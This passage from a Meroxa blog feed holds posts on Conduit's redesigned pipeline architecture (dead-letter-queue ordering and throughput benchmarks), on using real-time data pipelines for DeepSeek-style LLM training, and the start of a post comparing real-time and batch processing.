&lt;p&gt;What if we remove the 3rd record from the batch and first send the remaining 4 to the destination before sending the 3rd one to the DLQ? Again, the ordering guarantee can be violated if the 4 get successfully written to the destination, but the 3rd record fails to be written to the DLQ. In this case, the pipeline would stop, because the 3rd record failed to be written to any destination as well as the DLQ. The next time the pipeline is started, it would continue from the last acknowledged record. But since we have already written and acknowledged record 5, the pipeline will continue with record 6 and lose 3 forever.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/example4.png&quot; alt=&quot;example4.png&quot;&gt;&lt;/p&gt;
&lt;h3&gt;Split batch&lt;/h3&gt;
&lt;p&gt;The only correct thing to do is to split the batch into separate sub-batches:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;The first sub-batch contains records 1 and 2, which are sent to the destination as a single batch. Only once those are processed end-to-end and acknowledged can we continue to the next record.&lt;/li&gt;
&lt;li&gt;The second sub-batch contains only the 3rd record. The record is written to the DLQ, and if successful, it means the record has reached its end of the pipeline and can be acknowledged.&lt;/li&gt;
&lt;li&gt;Now the remaining records 4 and 5 can be sent to the destination as a single batch. Even if this operation fails, the records can safely be written to the DLQ, without violating any ordering guarantees.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/example5.png&quot; alt=&quot;example5.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;The example can get much more convoluted if you imagine multiple processors that fail to process multiple non-consecutive records in a batch. The generic solution we came up with is splitting the batch into sub-batches of consecutive records that are either all successfully or unsuccessfully processed. This approach allows us to retain the end-to-end ordering guarantee even in the face of failures.&lt;/p&gt;
&lt;h2&gt;Performance Benchmarks&lt;/h2&gt;
&lt;h3&gt;Benchmark Setup&lt;/h3&gt;
&lt;p&gt;We tested the performance of the new architecture compared to the old architecture in an end-to-end test using the simplest pipeline you can build in Conduit. The source generates records as fast as possible, while the destination logs them with the level &quot;trace&quot;, so the records don&apos;t show up in the log (Conduit by default only displays INFO and higher levels). Both connectors are built-in ones which further minimizes the effect of connectors on the test.&lt;/p&gt;
&lt;p&gt;Here is the pipeline configuration file we used for our tests:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2.2&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; benchmark
    &lt;span class=&quot;token key atrule&quot;&gt;status&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; running
    &lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; generator
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; source
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;generator
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;format.type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; file &lt;span class=&quot;token comment&quot;&gt;# take payload from file, to skip generation overhead&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;format.options.path&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; ./payload.txt &lt;span class=&quot;token comment&quot;&gt;# different payload sizes - 25B, 1kB, 10kB&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;sdk.batch.size&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;10000&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;# different barch sizes - 1, 10, 100, 1000, 10000&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;sdk.batch.delay&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; 0s &lt;span class=&quot;token comment&quot;&gt;# turn off time based batch collection&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; log
        &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; destination
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;log
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
          &lt;span class=&quot;token key atrule&quot;&gt;level&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; trace
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We used different scenarios, to get a better overall picture of the performance:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We tested different batch sizes (1, 10, 100, 1.000 and 10.000) by changing the &lt;code class=&quot;language-text&quot;&gt;sdk.batch.size&lt;/code&gt; field on the source connector.&lt;/li&gt;
&lt;li&gt;We tested different payload sizes (25B, 1kB, 10kB) by adjusting the &lt;code class=&quot;language-text&quot;&gt;format.options.path&lt;/code&gt; and supplying a file of the corresponding size.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We ran all pipelines on both the old and the new architecture, therefore we tested a total of 30 pipelines. While the pipelines were running we were collecting metrics using Prometheus and analyzed them with Grafana. We were specifically interested in the average throughput (messages per second) and the average latency of a message (i.e. how long it takes for a message to flow from the source to the destination).&lt;/p&gt;
&lt;p&gt;The tests were executed using Conduit v0.12.3 on a 2024 MacBook Pro with the M4 Max CPU and 36GB of RAM.&lt;/p&gt;
&lt;h3&gt;Results&lt;/h3&gt;
&lt;p&gt;For a payload size of 25 bytes, the new architecture achieved a peak message rate of 569,000 messages per second with a throughput of 13.6 MB/s at a batch size of 10,000. In comparison, the old architecture could only process up to 117,000 messages per second, achieving a throughput of 2.8 MB/s under similar conditions. Latency in the new architecture remained under 1 millisecond for smaller batch sizes and scaled efficiently, reaching 10-25 milliseconds even with a batch size of 10,000. That&apos;s half the latency we observed in the old architecture.&lt;/p&gt;
&lt;p&gt;Note that we are measuring the throughput based on the raw payload size in the source. Every record has metadata attached, like when it was read, the source connector ID, the source connector plugin name and version, etc. Because the payload size is only 25 bytes, the metadata is much larger than the payload in this scenario. So even though the throughput in terms of MB/s might seem low, keep in mind that the actual message size is much larger, and Conduit is pushing more than half a million records per second through the pipeline.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/graph-25b.png&quot; alt=&quot;graph-25b.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Testing a more realistic scenario with 1 KB payloads, the new architecture reached a peak throughput of 267.6 MB/s, corresponding to 274,000 messages per second with a batch size of 1,000. This marks a substantial improvement over the old architecture, which peaked at 98,000 messages per second and 95.7 MB/s. Latency remained under 1 millisecond for smaller batch sizes and scaled gracefully to 25-50 milliseconds for larger batches.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/graph-1k.png&quot; alt=&quot;graph-1k.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;With 10 KB messages, the new architecture delivered a throughput of up to 507.8 MB/s, representing a significant increase from the old architecture&apos;s peak throughput of 380.9 MB/s. The message rate in the new architecture rose to 52,000 messages per second at the highest batch size tested, compared to 39,000 messages per second in the old architecture. Curiously, the old architecture achieved a better throughput in the case of no batching (batch size of 1), although the difference was negligible and was made up by higher throughputs when batching was enabled.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/graph-10k.png&quot; alt=&quot;graph-10k.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Overall, the new architecture outperformed the old one in almost all tested scenarios, particularly excelling in high-throughput and low-latency applications. These improvements demonstrate the effectiveness of the architectural changes in enhancing performance across varying message sizes and batch configurations.&lt;/p&gt;
&lt;h2&gt;Conclusion: The Future of Conduit&lt;/h2&gt;
&lt;p&gt;The results of our evaluation highlight the substantial performance gains achieved by the new architecture. We are pleased with our decision to simplify and improve Conduit&apos;s internals which resulted in an increase in throughput of over 5x for certain scenarios, while further reducing the end-to-end latency. The changes allow Conduit to address even more demanding real-world scenarios.&lt;/p&gt;
&lt;p&gt;The rollout of the new architecture is controlled via a feature flag which should ensure a smooth transition while allowing early adopters to test its capabilities in their own environments. We encourage you to experiment with this new architecture and provide feedback:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ conduit run --preview.pipeline-arch-v2&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;One exciting area for future exploration is the possibility of parallelizing workers by loosening ordering guarantees, such as partitioning the record stream and processing it with multiple workers. This approach could further increase the throughput for workloads that don&apos;t demand such guarantees. Open a &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub&lt;/a&gt; discussion or join us on &lt;a href=&quot;https://https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt; and let us know if this is something you would like to see next! Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Unlock DeepSeek-Level Efficiency: Supercharge Your LLMs with Meroxa]]></title><description><![CDATA[This blog explores DeepSeek's hybrid training methodology, combining Supervised Learning and Reinforcement Learning, and emphasizes the critical role of real-time data orchestration for efficient LLM training. By showcasing how Meroxa’s platform enables dynamic data ingestion, seamless feedback loops, and scalable feature engineering, the blog provides actionable insights for professionals designing high-performance, real-time AI systems.]]></description><link>https://meroxa.com/blog/unlock-deepseek-level-efficiency-supercharge-your-llms-with-meroxa</link><guid isPermaLink="false">https://meroxa.com/blog/unlock-deepseek-level-efficiency-supercharge-your-llms-with-meroxa</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Tue, 28 Jan 2025 10:13:00 GMT</pubDate><content:encoded>&lt;p&gt;The recent &lt;strong&gt;DeepSeek&lt;/strong&gt; announcement has demonstrated a powerful hybrid training approach that combines &lt;strong&gt;supervised learning (SL)&lt;/strong&gt; and &lt;strong&gt;reinforcement learning (RL)&lt;/strong&gt; to achieve ChatGPT-like performance with significantly fewer computational resources. At the heart of its success is an efficient multi-stage training pipeline that transitions from SL to RL while leveraging high-quality feedback loops.&lt;/p&gt;
&lt;p&gt;At &lt;strong&gt;Meroxa&lt;/strong&gt;, we believe that real-time data orchestration is critical to unlocking this level of efficiency for companies building their own LLMs. In this post, we’ll dive deeper into how &lt;strong&gt;DeepSeek works&lt;/strong&gt;, how &lt;strong&gt;real-time data pipelines&lt;/strong&gt; play a crucial role, and how &lt;strong&gt;Meroxa integrates into LLM training architectures&lt;/strong&gt; to replicate and surpass these results.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;How DeepSeek Works&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;DeepSeek achieves its performance through an efficient hybrid training process that combines &lt;strong&gt;Supervised Learning (SL)&lt;/strong&gt; and &lt;strong&gt;Reinforcement Learning (RL)&lt;/strong&gt;. This multi-stage approach reduces the need for extensive datasets and computational resources while optimizing model performance.&lt;/p&gt;
&lt;p&gt;Here’s how it works:
&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-01-28-100257.png&quot; alt=&quot;mermaid-diagram-2025-01-28-100257.png&quot;&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Detailed Stages of DeepSeek&lt;/strong&gt;&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Initial Data Collection&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Gather labeled data from domain experts or curated datasets. This data forms the foundation for supervised learning.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Supervised Learning Pretraining&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Train a base model using the collected labeled data. This step creates a &quot;cold-start&quot; model with basic capabilities, reducing the need for random exploration in RL.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Reinforcement Learning Fine-Tuning&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Transition the pretrained model into an RL framework. The model interacts with dynamic simulations or real-world environments, learning to improve based on reward signals.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Dynamic Environment Simulations&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Use simulations that replicate real-world conditions. These environments are continuously updated with new data to ensure training relevance.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Reward Signal Generation&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Evaluate the model’s actions and generate reward signals based on predefined success metrics (e.g., accuracy, efficiency, or user satisfaction).&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Optimized Policy&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Iterate through multiple RL cycles, refining the model’s policy to maximize cumulative rewards.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Deployed Model&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Deploy the trained model into production, where it operates based on its learned policy.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Production Feedback&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Collect real-time feedback from the deployed model’s performance. This feedback loop ensures the model continues to adapt to new data or changing conditions.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;How Meroxa Enables DeepSeek-Level Performance&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;DeepSeek’s hybrid training pipeline relies heavily on fresh, high-quality data and efficient feedback loops. Without a robust &lt;strong&gt;real-time data orchestration&lt;/strong&gt; layer, replicating this efficiency is challenging. This is where Meroxa excels.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Key Benefits of Meroxa for DeepSeek-Like Architectures&lt;/strong&gt;:&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Data Ingestion&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Stream operational metrics, user interactions, and environment simulations into training pipelines.&lt;/li&gt;
&lt;li&gt;Ensure that training data is always up-to-date, reducing redundancy and improving model generalization.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Seamless Feedback Integration&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Enable closed-loop learning by streaming production feedback (e.g., user ratings, success/failure metrics) directly into RL pipelines.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalable Feature Engineering&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Use Meroxa’s platform to preprocess and transform data in real time, ensuring that training pipelines receive high-quality, actionable features.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Dynamic Environment Updates&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Keep RL environments dynamic by feeding in live data streams, ensuring simulations stay representative of real-world conditions.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;&lt;strong&gt;Updated Workflow&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The following workflow shows how Meroxa integrates into the training pipeline to enable DeepSeek-like performance:
&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-01-28-100415.png&quot; alt=&quot;mermaid-diagram-2025-01-28-100415.png&quot;&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Detailed Integration: How Meroxa Fits into the Pipeline&lt;/strong&gt;&lt;/h3&gt;
&lt;h3&gt;&lt;strong&gt;1. Real-Time Data Sources&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa connects to diverse real-time data sources, such as:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;User interactions&lt;/strong&gt;: Chat logs, clicks, or other behavioral data.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Operational logs&lt;/strong&gt;: System metrics like latency, throughput, or errors.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Production feedback&lt;/strong&gt;: Model evaluation metrics, customer ratings, or outcomes.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;External APIs&lt;/strong&gt;: Third-party data streams (e.g., stock prices, social media trends).&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;2. Meroxa’s Platform&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa acts as the central data orchestration layer:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Connectors&lt;/strong&gt;: Seamlessly ingest data using CDC, streaming APIs, or message queues like Kafka.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Transformation Layer&lt;/strong&gt;: Clean, filter, and preprocess raw data streams.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Feature Engineering&lt;/strong&gt;: Aggregate and create features needed for training (e.g., state-action pairs for RL or reward signals).&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;3. Training Pipeline&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Supervised Learning (SL)&lt;/strong&gt;: Use Meroxa&apos;s preprocessed data to pretrain the LLM.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Reinforcement Learning (RL)&lt;/strong&gt;: Stream live data into RL environments to fine-tune the model based on up-to-date conditions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Dynamic Simulations&lt;/strong&gt;: Continuously update simulations with real-world data for more accurate environment modeling.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;4. Deployment and Feedback&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Deploy the LLM in production and monitor its performance in real time.&lt;/li&gt;
&lt;li&gt;Stream feedback metrics back to Meroxa for ongoing training and optimization.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Real-Life Applications of DeepSeek-Like Architectures with Real-Time Data&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Real-time data pipelines, enabled by platforms like Meroxa, empower businesses to train and deploy more efficient and performant large language models (LLMs) across various domains. Below, we explore &lt;strong&gt;detailed use cases&lt;/strong&gt; for such architectures and highlight how real-time data integration transforms performance and adaptability.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;1. Conversational AI for Customer Support&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;In customer support, chatbots powered by LLMs often face challenges in adapting to evolving customer queries, new product launches, or unexpected issues. Static training datasets quickly become outdated, leading to suboptimal responses and user dissatisfaction. Meroxa addresses this by streaming live chat logs, customer feedback, and conversation outcomes into the training pipeline. Supervised learning is employed initially to provide the chatbot with a strong linguistic foundation, while reinforcement learning refines its ability to resolve complex issues based on real-world feedback.&lt;/p&gt;
&lt;p&gt;Meroxa integrates seamlessly by ingesting live interaction data through CDC connectors, transforming it into actionable features, and feeding these into the LLM’s supervised pretraining and reinforcement learning loops. The chatbot is continuously fine-tuned using data collected from production environments, creating a feedback loop that ensures it evolves alongside user expectations.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-01-28-100454.png&quot; alt=&quot;mermaid-diagram-2025-01-28-100454.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;This continuous improvement cycle transforms the chatbot into a highly responsive and context-aware virtual assistant, reducing user frustration and improving resolution rates.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;2. Personalized E-Commerce Recommendations&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;E-commerce platforms rely on recommendation engines to drive engagement and increase sales. However, static models often fail to account for real-time changes in customer behavior, such as trending products during promotions or seasonal preferences. Meroxa enables continuous real-time data integration by ingesting clickstream data, cart additions, and abandoned cart metrics.&lt;/p&gt;
&lt;p&gt;Using Meroxa’s platform, raw customer data is transformed into actionable features and fed into reinforcement learning pipelines. The recommendation engine continuously refines its suggestions based on live user behavior and feedback loops. This enables the model to adapt dynamically, prioritizing products that align with real-time shopping trends.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-01-28-100516.png&quot; alt=&quot;mermaid-diagram-2025-01-28-100516.png&quot;&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;3. Fraud Detection for Financial Institutions&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Detecting fraud in financial transactions requires models that can quickly adapt to emerging patterns and techniques used by malicious actors. Static fraud detection systems struggle to identify new anomalies because they rely on historical data that becomes outdated. Meroxa provides a solution by streaming live transactional data, anomaly reports, and confirmed fraud cases into the training pipeline.&lt;/p&gt;
&lt;p&gt;The system uses supervised learning for pretraining, enabling the detection of common fraud patterns. Reinforcement learning further fine-tunes the model by exposing it to real-time transaction simulations, allowing it to learn from both successful detections and missed anomalies. Meroxa’s feedback loop ensures that confirmed fraud cases are reintegrated into the training process, creating a continuously evolving fraud detection system.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-01-28-100543.png&quot; alt=&quot;mermaid-diagram-2025-01-28-100543.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;This architecture ensures financial institutions are equipped with proactive, adaptive fraud detection systems that minimize losses and maintain trust.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;4. Adaptive Financial Modeling&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;In financial modeling, LLMs are frequently used to forecast market trends, predict stock movements, or assess credit risk. However, financial markets are inherently volatile, and models trained on static datasets fail to reflect real-time conditions, leading to inaccurate predictions. Meroxa enables adaptive modeling by streaming live market data, economic indicators, and transactional logs directly into the training pipelines.&lt;/p&gt;
&lt;p&gt;The platform facilitates the preprocessing and transformation of raw financial data into relevant features. The LLM undergoes supervised pretraining to capture long-term patterns and trends. This is followed by reinforcement learning, where the model interacts with dynamic simulations or live environments to adapt to market fluctuations. Feedback from deployed predictions informs further fine-tuning, ensuring the model’s continuous improvement.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/mermaid-diagram-2025-01-28-100618.png&quot; alt=&quot;mermaid-diagram-2025-01-28-100618.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;This integration allows financial institutions to deploy models that remain accurate and reliable, even in rapidly changing economic environments.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;DeepSeek has shown us that high-performance models don’t require endless resources—they require &lt;strong&gt;efficient pipelines and fresh data&lt;/strong&gt;. With Meroxa, your team can build real-time data workflows that rival or exceed the efficiency of DeepSeek’s approach, enabling your LLMs to deliver superior results at a fraction of the cost.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ready to build smarter, faster pipelines?&lt;/strong&gt; &lt;a href=&quot;https://meroxa.com/&quot;&gt;Contact us&lt;/a&gt; to learn more about how we can help you achieve DeepSeek-level performance. Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real-Time vs. Batch: Why Real-Time Pipelines Are the Future]]></title><description><![CDATA[This blog dives into the critical differences between batch and real-time data pipelines, exploring why businesses are shifting towards real-time solutions to stay competitive. It highlights the limitations of batch processing—such as stale data, inefficiencies, and scalability challenges—while showcasing the benefits of real-time pipelines, including always up-to-date insights, proactive decision-making, and enhanced customer experiences. The blog also demonstrates how Meroxa’s Conduit Platform simplifies real-time data integration with features like in-flight transformations, cloud-native scalability, and real-time observability, making it the ideal tool for modern data workflows. Perfect for developers, data engineers, and business leaders seeking to harness the power of real-time data.]]></description><link>https://meroxa.com/blog/real-time-vs-batch-why-real-time-pipelines-are-the-future</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-vs-batch-why-real-time-pipelines-are-the-future</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Thu, 23 Jan 2025 13:32:00 GMT</pubDate><content:encoded>&lt;h3&gt;What You Need to Know About Real-Time vs. Batch Processing&lt;/h3&gt;
&lt;p&gt;More increasingly businesses need data insights faster than ever before. Whether it’s making real-time recommendations, detecting fraud, or responding to market shifts, speed is key. For decades, batch processing was the standard for managing data workflows. But with the rise of real-time pipelines, the limitations of batch processing have become clear—and businesses are shifting their focus to solutions that can keep up with the pace of modern demands.&lt;/p&gt;
&lt;h3&gt;The Limitations of Batch Processing&lt;/h3&gt;
&lt;p&gt;Batch processing involves collecting, processing, and analyzing data in scheduled intervals—daily, hourly, or even weekly. While it has served many organizations well, its limitations are becoming increasingly problematic:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Stale Data:&lt;/strong&gt; Batch pipelines process data in bulk, which means insights are only as fresh as the last batch. This lag can lead to outdated or irrelevant insights.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Operational Inefficiencies:&lt;/strong&gt; Processing large volumes of data simultaneously can result in resource bottlenecks, increasing costs and reducing system efficiency.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Limited Responsiveness:&lt;/strong&gt; Batch workflows are ill-suited for use cases requiring immediate action, such as fraud detection or real-time personalization.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Complexity at Scale:&lt;/strong&gt; As data grows in volume and velocity, batch systems become harder to scale and maintain, often requiring extensive engineering resources.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;The Power of Real-Time Pipelines&lt;/h3&gt;
&lt;p&gt;Real-time pipelines, by contrast, process data as it is generated. This enables businesses to act on fresh, accurate information and unlock new possibilities for data-driven decision-making. Here’s why real-time is the future:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Always Up-to-Date Insights:&lt;/strong&gt; Real-time pipelines ensure that data is processed and delivered continuously, enabling instant access to the latest information.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Improved Customer Experiences:&lt;/strong&gt; Applications like recommendation engines, dynamic pricing, and chatbots thrive on real-time data to deliver personalized and timely interactions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Proactive Decision-Making:&lt;/strong&gt; Real-time pipelines empower businesses to detect and respond to anomalies, opportunities, or threats as they happen.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Operational Efficiency:&lt;/strong&gt; By processing data incrementally, real-time pipelines reduce the need for resource-intensive batch jobs, leading to better cost control and scalability.&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Why Meroxa’s Conduit Platform Leads in Real-Time Data Processing&lt;/h3&gt;
&lt;p&gt;Meroxa’s Conduit Platform is purpose-built to enable real-time data movement and transformation, addressing the limitations of batch processing head-on. Here’s how the Conduit Platform stands out:&lt;/p&gt;
&lt;h3&gt;1. &lt;strong&gt;Seamless Real-Time Integration&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The Conduit Platform connects to a wide range of data sources, including databases, APIs, and event streams, ingesting data in real-time. Unlike batch-focused systems, the Conduit Platform ensures minimal latency from data source to destination.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Example:&lt;/strong&gt; While traditional batch tools might update a dashboard once an hour, the Conduit Platform streams data continuously, keeping dashboards current with every new event.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Technical Insight:&lt;/strong&gt; Conduit’s connectors library include Postgres, MongoDB, Kafka, and Snowflake, enabling event-driven architectures with minimal setup and configuration.&lt;/li&gt;
